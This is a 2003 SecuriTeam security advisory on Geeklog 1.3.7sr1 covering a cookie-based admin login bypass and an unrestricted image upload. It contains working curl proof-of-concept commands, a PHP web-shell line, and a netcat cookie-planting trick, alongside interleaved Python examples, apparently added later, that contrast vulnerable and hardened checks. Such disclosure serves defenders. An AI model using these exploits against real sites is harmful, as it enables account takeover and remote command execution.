[UNIX] Geeklog Multiple Vulnerabilities (Integer Rounding, File Upload)

From: SecuriTeam (support_at_securiteam.com)
Date: 05/31/03


To: list@securiteam.com
Date: 31 May 2003 15:16:21 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

  Geeklog Multiple Vulnerabilities (Integer Rounding, File Upload)
------------------------------------------------------------------------

SUMMARY

 <http://geeklog.sourceforge.net/index.php?topic=GeekLog> Geeklog is "a
web content management system suitable for running full-featured community
sites. It supports article posting, threaded comments, event scheduling,
and link management and is built around a design philosophy that
emphasizes ease of use". Multiple security vulnerabilities have been found
in the product: one allows elevated privileges to be gained by supplying a
non-integer value as the userid in the login cookie, the other allows a
file with any extension to be uploaded through the image upload code (from
which arbitrary commands can be executed on the server).

DETAILS

Vulnerable systems:
 * Geeklog version 1.3.7sr1 and below

SQL Integer manipulation in authentication script
Vulnerable code:
from lib-sessions.php line 128
------------------------------------------------
       if (isset($HTTP_COOKIE_VARS[$_CONF['cookie_name']])) {
           // Session cookie doesn't exist but a perminant cookie does.
           // Start a new session cookie;
           if ($_SESS_VERBOSE) {
               COM_errorLog('perm cookie found from lib-common.php',1);
           }

           $userid = $HTTP_COOKIE_VARS[$_CONF['cookie_name']];
           $cookie_password = $HTTP_COOKIE_VARS[$_CONF['cookie_password']];

           //echo $userid;

           $userpass = DB_getItem($_TABLES['users'],'passwd',"uid = $userid");

           if ($cookie_password <> $userpass) {
               // User could have modified UID in cookie, don't do shit

           } else {
               if ($userid) {
                   $user_logged_in = 1;
                   //echo $userid;
                   // Create new session and write cookie
                   $sessid = SESS_newSession($userid, $REMOTE_ADDR,
                       $_CONF['session_cookie_timeout'], $_CONF['cookie_ip']);
                   SESS_setSessionCookie($sessid, $_CONF['session_cookie_timeout'],
                       $_CONF['cookie_session'], $_CONF['cookie_path'],
                       $_CONF['cookiedomain'], $_CONF['cookiesecure']);
                   $userdata = SESS_getUserDataFromId($userid);
                   $_USER = $userdata;
               }
           }
       }

In this case DB_getItem($_TABLES['users'],'passwd',"uid = $userid") executes

SELECT passwd FROM $_TABLES['users'] WHERE uid=$userid

with $userid taken straight from the permanent cookie. If the cookie names a
uid that does not exist, no row matches and $userpass comes back empty; if no
password cookie is sent at all, $cookie_password is null as well. The loose
comparison ($cookie_password <> $userpass) then sees two empty values, treats
them as equal and falls through to the logged-in branch. Nothing checks that
a password was actually found for the user.

Example:
curl -b geeklog=9999 http://blablaba/users.php

SESS_newSession($userid, $REMOTE_ADDR, $_CONF['session_cookie_timeout'],
$_CONF['cookie_ip']) then executes the SQL query:

INSERT INTO {$_TABLES['sessions']} (sess_id, md5_sess_id, uid, start_time,
remote_ip) VALUES ($sessid, '$md5_sessid', 9999, $currtime, '$remote_ip')

No session for uid 9999 exists yet, so the row is inserted and the client
receives a session cookie bound to a user that does not exist in the users
table.

Integer manipulation to achieve administrative access
By supplying a floating-point number as the userid, an attacker can log in as
any Geeklog user without knowing a password. The uid column is of integer
type, so "WHERE uid=2.1" matches no row and $userpass is empty, exactly the
non-existing-user case above, and the password check passes. The same
unquoted value is then written into the sessions table, where the literal
2.1 is stored as 2 because the column is an integer. The result is a valid
session for uid 2, the Admin account in a default installation.

Proof of concept:
curl -b geeklog=2.1 -D header.txt http://blablabla/users.php

header.txt will then contain the Set-Cookie header for a valid admin
session.
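The following is an added example, not Geeklog's own code: the permanent-cookie login check from lib-sessions.php replayed in Python against an in-memory SQLite database, once as the 1.3.7sr1 logic behaves and once hardened. The users/sessions layout, the placeholder password hashes and the MySQL behaviour of rounding an unquoted fractional literal when it is stored into an INT column are assumptions modelled here (SQLite does not coerce that way by itself).

```python
"""Added example (not Geeklog code): lib-sessions.php cookie check, vulnerable
and hardened, against a constructed SQLite fixture."""
import hmac
import math
import re
import sqlite3


def make_db():
    """Constructed fixture: uid 1 is Anonymous, uid 2 is Admin (default install)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (uid INTEGER PRIMARY KEY, passwd TEXT)")
    con.execute("CREATE TABLE sessions (sess_id INTEGER PRIMARY KEY, uid INTEGER)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [(1, ""), (2, "md5-of-admin-password"), (3, "md5-of-bob-password")])
    return con


def mysql_int_column(value):
    """Model (assumption) of MySQL storing the unquoted literal $userid in an
    INT column: 2.1 -> 2, 2.5 -> 3. SQLite would keep 2.1 as a REAL."""
    return int(math.floor(float(value) + 0.5))


def vulnerable_login(con, cookie_uid, cookie_password=""):
    """Mirrors lib-sessions.php: $userid is pasted into the query unquoted,
    a missing password cookie is '', and '' <> '' is false."""
    row = con.execute(
        f"SELECT passwd FROM users WHERE uid = {cookie_uid}").fetchone()
    userpass = row[0] if row else ""           # DB_getItem on no match -> empty
    if cookie_password != userpass:            # ($cookie_password <> $userpass)
        return None
    if not cookie_uid:                         # if ($userid)
        return None
    stored_uid = mysql_int_column(cookie_uid)  # INSERT ... VALUES (..., 2.1, ...)
    con.execute("INSERT INTO sessions (uid) VALUES (?)", (stored_uid,))
    return stored_uid                          # uid the new session belongs to


def hardened_login(con, cookie_uid, cookie_password=""):
    """Same check with the defects closed: the uid must be a plain integer,
    it is bound as a parameter (so the cookie can never alter the statement),
    and an unknown user or empty stored hash is a failure, not a match."""
    if not re.fullmatch(r"[1-9][0-9]*", cookie_uid):
        return None
    uid = int(cookie_uid)
    row = con.execute("SELECT passwd FROM users WHERE uid = ?", (uid,)).fetchone()
    if row is None or not row[0] or not cookie_password:
        return None
    if not hmac.compare_digest(row[0], cookie_password):
        return None
    con.execute("INSERT INTO sessions (uid) VALUES (?)", (uid,))
    return uid


if __name__ == "__main__":
    con = make_db()
    print("vulnerable, cookie geeklog=2.1  ->", vulnerable_login(con, "2.1"))
    print("vulnerable, cookie geeklog=9999 ->", vulnerable_login(con, "9999"))
    print("hardened,   cookie geeklog=2.1  ->", hardened_login(con, "2.1"))
```

The vulnerable path returns a session for uid 2 on the cookie value "2.1" with no password at all, and a session for the non-existent uid 9999; the hardened path rejects both and only accepts uid 2 with the stored hash. Note that the same unquoted interpolation of $userid also means the cookie value reaches the SQL statement unescaped, which the bound parameter in the hardened version removes.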

Uploading image with any extension
The image upload code (found in both the users.php and stories.php modules)
decides whether a file is an image from the MIME type sent by the browser and
never checks the file's extension. A file that begins with a valid image
header but ends in .php is therefore accepted and stored with its original
extension in the images directory, where the web server executes it. By
embedding PHP code in the image, a user can run arbitrary commands as the web
server account ('nobody' on the tested system).

Proof of concept:
i) Upload the attached file (image.php, built with the Perl script below)
using Internet Explorer. Internet Explorer derives the MIME type of an
upload from the file header rather than the extension, so the .php file is
sent as an image type and passes the check.

ii) Execute:
curl -d 'cmd=ps -ef' http://blablabla/images/XXXXX-X.php
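As an added example (not Geeklog's own code), the check that the 1.3.7sr1 upload code lacks: the client-supplied MIME type is ignored, the extension must be on an allowlist, the first bytes must match a known signature for that extension, and the file is stored under a server-chosen name with a single extension. The accepted formats, the signature table and the function name are assumptions for this example.

```python
"""Added example (not Geeklog code): image upload validation that does not
trust the browser's MIME type or the original file name."""
import os
import secrets

# Magic bytes each allowed extension must start with. Assumption: only these
# formats are wanted for user photos and story images.
IMAGE_SIGNATURES = {
    "gif":  (b"GIF87a", b"GIF89a"),
    "jpg":  (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png":  (b"\x89PNG\r\n\x1a\n",),
}


def validate_upload(filename, client_mime, data):
    """Return (True, stored_name) or (False, reason).

    client_mime is taken as a parameter only to make the point that it is
    never consulted: Internet Explorer derives it from the file header, so it
    says nothing about how the server will treat the stored file's extension.
    """
    del client_mime  # deliberately ignored
    base = os.path.basename(filename)
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in IMAGE_SIGNATURES:
        return False, f"extension .{ext} not allowed"
    if not any(data.startswith(sig) for sig in IMAGE_SIGNATURES[ext]):
        return False, f"content does not look like a .{ext} image"
    # Server-chosen basename with exactly one extension: the original name,
    # including something like 'shell.php.gif', never reaches the filesystem.
    stored = f"{secrets.token_hex(8)}.{ext}"
    return True, stored


if __name__ == "__main__":
    # Constructed inputs: the advisory's image.php trick, and a normal avatar.
    webshell = b"GIF89a" + b"<?php system($_POST['cmd']); ?>"
    print(validate_upload("XXXXX-X.php", "image/gif", webshell))
    print(validate_upload("avatar.gif", "image/gif", b"GIF89a" + b"\x00" * 16))
```

This stops the extension trick, not every risk of stored scripts: a well-formed GIF can still carry "<?php" inside its data, so the images directory must also be served without PHP execution (for Apache with mod_php, for example, "php_admin_flag engine off" in that directory's configuration), or stored outside the web root and served through a script.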

Vendor response:
The vendor was contacted on 19/05/2003 and a fixed version is available from
http://www.geeklog.net

Image.php creation:
To create the image.php file use the following Perl script (the base64
payload is not reproduced here):
#!/usr/bin/perl
use MIME::Base64;

# base64 of image.php: an image header followed by PHP code (payload omitted)
$File = <<EOF;
EOF

$decoded = decode_base64($File);
print $decoded;

Tips:
A simple way to make Mozilla store a session cookie captured from another
site (for example the gl_session value from header.txt above).

i) Edit header.txt so that it is a complete HTTP response setting the cookie:
----------------header.txt -------------------------

HTTP/1.1 200 OK
Date: Sat, 17 May 2003 16:15:23 GMT
Server: Apache
Set-Cookie: gl_session=1828197392; path=/
Set-Cookie: LastVisit=1053188123; expires=Sun, 16-May-2004 16:15:23 GMT;
path=/
Set-Cookie: LastVisitTemp=deleted; expires=Fri, 17-May-2002 16:15:22 GMT;
path=/; domain=http://blablabla/
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

20
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
0

----------------header.txt --------------------------

ii) Serve it once using netcat:
# nc -l -p 9090 < header.txt

iii) Set your Mozilla HTTP proxy server to 127.0.0.1:9090.

iv) Browse to http://blablabla.com/ ; the request goes to netcat, which
answers with header.txt, and Mozilla stores the cookies for blablabla.com.

v) Unset the proxy and browse to http://blablabla.com again, now sending the
captured gl_session cookie to the real site.

ADDITIONAL INFORMATION

The information has been provided by
<mailto:pokleyzz@scan-associates.net> pokleyzz.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


